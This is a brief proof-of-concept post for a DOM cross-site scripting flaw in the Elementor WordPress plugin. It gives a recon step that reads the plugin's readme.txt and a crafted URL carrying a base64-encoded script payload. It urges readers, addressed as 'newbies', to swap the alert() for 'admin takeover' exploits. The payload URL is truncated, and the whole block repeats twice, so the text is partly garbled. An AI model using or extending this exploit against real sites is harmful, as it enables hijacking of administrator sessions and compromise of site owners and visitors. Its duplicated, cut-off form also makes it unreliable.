DOM Cross-Site-Scripting Elementor POC
RECON ON TARGET
To find installed version of Elementor Plugin on target manually
Use : https://target.com/wp-content/plugins/elementor/readme.txt
To Test / Fire Up Xss on target
Alert XSS SAMPLE POC EXPLOIT : https://target.com/#elementor-actio...iOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
for newbies : PARAM : settings=base64
contains the js code alert() , you can change it to more interesting xss exploits (admin takeover and etc)
RECON ON TARGET
To find installed version of Elementor Plugin on target manually
Use : https://target.com/wp-content/plugins/elementor/readme.txt
To Test / Fire Up Xss on target
Alert XSS SAMPLE POC EXPLOIT : https://target.com/#elementor-actio...iOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
for newbies : PARAM : settings=base64
contains the js code alert() , you can change it to more interesting xss exploits (admin takeover and etc)